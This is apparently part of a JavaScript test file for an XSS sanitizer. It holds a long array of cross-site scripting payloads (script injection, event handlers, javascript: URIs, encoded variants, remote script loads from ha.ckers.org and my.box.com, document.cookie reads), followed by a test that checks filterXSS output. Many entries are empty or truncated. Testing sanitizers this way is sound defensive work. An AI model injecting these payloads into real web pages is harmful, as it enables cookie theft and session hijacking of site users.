`<iframe/src //onload = prompt(1)<iframe/onreadystatechange=alert(1)<svg/onload=alert(1)<input value=<><iframe/src=javascript:confirm(1)<input type="text" value=\`\` <div/onmouseover='alert(1)'>X</div>http://www.[removed]alert(1)</script .com<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe><svg>[removed]alert(1)<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe><img src><meta http-equiv="refresh" content="0;javascript:alert(1)"/>`,
`<math><a>click<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>`,
`<svg contentScriptType=text/vbs>[removed]MsgBox+1<a href>X</a<iframe/onreadystatechange=alert('a') worksinIE>[removed]~'a' ; throw ~ this. alert(~'a')</script U+<script/src="data:text%2Fjavascript,alert('a')"></script a=a & /=%2F`,
`<script/src=data:text/javascript,a%6C%65%72%74(/XSS/)></script<object data=javascript:ale%72t(1)><body/onload=<!-->
alert(1)>[removed]/*<script* */alert(1)</script<img src ?itworksonchrome?/onerror = alert(1)<svg>[removed]//
confirm(1);</script </svg>`,
`<svg>[removed] alert(1)<a href>ClickMe[removed] alert(1) </script 1=2<div/onmouseover='alert(1)'> style="x:"><--\`<img/src=\` onerror=alert(1)> --!>`,
` <script/src=data:text/javascript,alert(1)><div>x</button>"><img src><form><button formaction=javascript:alert(1)>CLICKME<math><a>click<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object><iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe><a href>Click Me</a>`,
`‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–>”>’>`,
`<img>”>`,
`<img src>`,
`<img src>`,
`<img src>`,
`<`,
`%253cscript%253ealert(1)%253c/script%253e`,
`“><s”%2b”cript>alert(document.cookie)`,
`foo`,
`<script>`,
`<img src>`,
`<img src>`,
`<img src>`,
`<BODY BACKGROUND=”javascript:alert(‘XSS’)”>`,
`<BODY ONLOAD=alert(‘XSS’)>`,
`<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>`,
`<IMG SRC=”javascript:alert(‘XSS’)”`,
`<iframe src=http://ha.ckers.org/scriptlet.html <`,
`javascript:alert("hellox worldss")`,
`<img src>`,
`<img src>`,
`<"';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>`,
`<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">`,
`<IFRAME SRC="javascript:alert('XSS');"></IFRAME>`,
`<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>`,
``,
``,
``,
``,
`PT SRC="http://ha.ckers.org/xss.js">`,
`<`,
`<"';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>`,
`';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>[removed]alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search`,
`&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510`,
`&search=1`,
`0&q=';alert(String.fromCharCode(88,83,83))//';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//";alert(String.fromCharCode(88,83,83)%?29//-->">'>&submit-frmGoogleWeb=Web+Search`,
`<h1><font color="blue">hellox worldss</h1>`,
`<BODY ONLOAD=alert('hellox worldss')>`,
`<input onfocus=write(XSS) autofocus>`,
`<input onblur=write(XSS) autofocus><input autofocus>`,
`<body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>`,
`<form><button formaction="javascript:alert(XSS)">lol`,
`<img src>`,
`<![><img src>`,
`<style><img src>`,
`<? foo="><script>alert(1)</script>">`,
`<! foo="><script>alert(1)</script>">`,
`</ foo="><script>alert(1)</script>">`,
`<? foo="><x foo='?><script>alert(1)</script>'>">`,
`<! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">`,
`<% foo><x foo="%><script>alert(123)</script>">`,
`<div>LOL`,
`LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>`,
``,
`<svg xmlns="http://www.w3.org/2000/svg">LOL</svg>`,
`<SCRIPT>alert(/XSS/.source)</SCRIPT>`,
`\\\";alert('XSS');//`,
`</TITLE><SCRIPT>alert("XSS");</SCRIPT>`,
`<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">`,
`<BODY BACKGROUND="javascript:alert('XSS')">`,
`<BODY ONLOAD=alert('XSS')>`,
`<IMG DYNSRC="javascript:alert('XSS')">`,
`<IMG LOWSRC="javascript:alert('XSS')">`,
`<BGSOUND SRC="javascript:alert('XSS');">`,
`<BR SIZE="&{alert('XSS')}">`,
`<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>`,
`<LINK REL="stylesheet" HREF="javascript:alert('XSS');">`,
`<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">`,
`<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>`,
`<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">`,
`<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>`,
`<XSS STYLE="behavior: url(xss.htc);">`,
`<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS`,
`<IMG SRC='vbscript:msgbox("XSS")'>`,
`<IMG SRC="mocha:[code]">`,
`<IMG SRC="livescript:[code]">`,
`žscriptualert(EXSSE)ž/scriptu`,
`<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">`,
`<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">`,
`<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"`,
`<IFRAME SRC="javascript:alert('XSS');"></IFRAME>`,
`<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>`,
`<TABLE BACKGROUND="javascript:alert('XSS')">`,
`<TABLE><TD BACKGROUND="javascript:alert('XSS')">`,
`<DIV STYLE="background-image: url(javascript:alert('XSS'))">`,
`<DIV STYLE="background-image: url(javascript:alert('XSS'))">`,
`<DIV STYLE="width: expression(alert('XSS'));">`,
`<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">`,
`<XSS STYLE="xss:expression(alert('XSS'))">`,
`exp/*<A STYLE='no\\xss:noxss("*//*");`,
`xss:ex/*XSS*//*/*/pression(alert("XSS"))'>`,
`<STYLE TYPE="text/javascript">alert('XSS');</STYLE>`,
`<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>`,
`<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>`,
`<!--[if gte IE 4]>`,
`<SCRIPT>alert('XSS');</SCRIPT>`,
`<![endif]-->`,
`<BASE HREF="javascript:alert('XSS');//">`,
`<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>`,
`<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>`,
`<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>`,
`<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>`,
`a="get";`,
`b=\"URL(\\\"\";`,
`c="javascript:";`,
`d=\"alert('XSS');\\\")\";`,
`eval(a+b+c+d);`,
`<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>`,
`<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>`,
`</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>`,
`<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>`,
`<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>`,
`<XML SRC="xsstest.xml" ID=I></XML>`,
`<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>`,
`<HTML><BODY>`,
`<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">`,
`<?import namespace="t" implementation="#default#time2">`,
`<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">`,
`</BODY></HTML>`,
`<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>`,
`<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->`,
`<? echo('<SCR)';`,
`echo('IPT>alert("XSS")</SCRIPT>'); ?>`,
`<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">`,
`Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser`,
`<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">`,
`<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-`,
`<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>`,
`<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>`,
`<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>`,
`<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>`,
`<SCRIPT a=\`>\` SRC="http://ha.ckers.org/xss.js"></SCRIPT>`,
`<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>`,
`<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>`,
`<A HREF="http://66.102.7.147/">XSS</A>`,
`<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>`,
`<A HREF="http://1113982867/">XSS</A>`,
`<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>`,
`<A HREF="http://0102.0146.0007.00000223/">XSS</A>`,
`<A HREF="htt p://6 6.000146.0x7.147/">XSS</A>`,
`<A HREF="//www.google.com/">XSS</A>`,
`<A HREF="//google">XSS</A>`,
`<A HREF="http://ha.ckers.org@google">XSS</A>`,
`<A HREF="http://google:ha.ckers.org">XSS</A>`,
`<A HREF="http://google.com/">XSS</A>`,
`<A HREF="http://www.google.com./">XSS</A>`,
`<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>`,
`<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>`,
`<`,
`%3C`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<iframe src=http://ha.ckers.org/scriptlet.html>`,
`<IMG SRC="javascript:alert('XSS')"`,
`<SCRIPT SRC=//ha.ckers.org/.js>`,
`<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>`,
`<<SCRIPT>alert("XSS");//<</SCRIPT>`,
`<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>`,
`<BODY onload!#$%&()*~+-_.,:;?@[/|]^\`=alert("XSS")>`,
`<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>`,
`<IMG SRC=" javascript:alert('XSS');">`,
`<IMG SRC="jav
ascript:alert('XSS');">`,
`<IMG SRC="jav
ascript:alert('XSS');">`,
`<IMG SRC="jav	ascript:alert('XSS');">`,
`<IMG SRC=javascript:alert('XSS')>`,
`<IMG SRC=javascript:alert('XSS')>`,
`<IMG SRC=javascript:alert('XSS')>`,
`<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`,
`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`,
`<IMG SRC=\`javascript:alert("RSnake says, 'XSS'")\`>`,
`<IMG SRC=javascript:alert("XSS")>`,
`<IMG SRC=JaVaScRiPt:alert('XSS')>`,
`<IMG SRC=javascript:alert('XSS')>`,
`<IMG SRC="javascript:alert('XSS');">`,
`<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>`,
`'';!--"<XSS>=&{()}`,
`';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>`,
`';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>`,
`'';!--"<XSS>=&{()}`,
``,
`<img src>`,
`<img src>`,
`<img src>`,
`<img src>`,
`<img>">`,
`<img src>`,
`<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js">`,
`<SCRIPT/SRC="http://ha.ckers.org/xss.js">`,
`<`,
``,
`";alert('XSS');//`,
`</TITLE>`,
`¼script¾alert(¢XSS¢)¼/script¾`,
`<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">`,
`<IFRAME SRC="javascript:alert('XSS');"></IFRAME>`,
`<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>`,
`<table>`,
`<table><td>`,
`<div>`,
`<div>`,
`<img>`,
`<XSS STYLE="xss:expression(alert('XSS'))">`,
`exp/*<a>`,
`<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>`,
`a="get";b="URL(ja"";c="vascr";d="ipt:ale";e="rt('XSS');")";eval(a+b+c+d+e);`,
``,
`<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"></BODY></HTML>`,
`PT SRC="http://ha.ckers.org/xss.js">`,
`<form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION`,
`<form><button formaction="javascript:alert(123)">crosssitespt`,
`<frameset onload=alert(123)>`,
`<img src>`,
`<style><img src>`,
`<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">`,
`<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">`,
`<embed src="javascript:alert(1)">`,
`<? foo="><script>alert(1)</script>">`,
`<! foo="><script>alert(1)</script>">`,
`</ foo="><script>alert(1)</script>">`,
``,
``,
``,
`;1`,
``,
`<svg xmlns="#"></svg>`,
`<svg onload="javascript:alert(123)" xmlns="#"></svg>`,
`<iframe xmlns="#" src="javascript:alert(1)"></iframe>`,
`+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-`,
`%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-`,
`+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-`,
`%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-`,
`%253cscript%253ealert(document.cookie)%253c/script%253e`,
`“><s”%2b”cript>alert(document.cookie)`,
`“>`,
`“><`,
`foo`,
`<script>`,
`%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E`,
`‘; alert(document.cookie); var foo=’`,
`foo’; alert(document.cookie);//’;`,
``,
`<img src>`,
`<BODY ONLOAD=alert(’XSS’)>`,
``,
`">`,
`<video src>`,
`<audio src>`
];
describe("xss sanitizing test", () => {
it("each string should be sanitized", () => {
maliciousPayloads.forEach((mp, idx) => {
expect(filterXSS(mp, { stripIgnoreTagBody: ["script"] })).toEqual(
expectedSanitized[idx]
);
});
});
});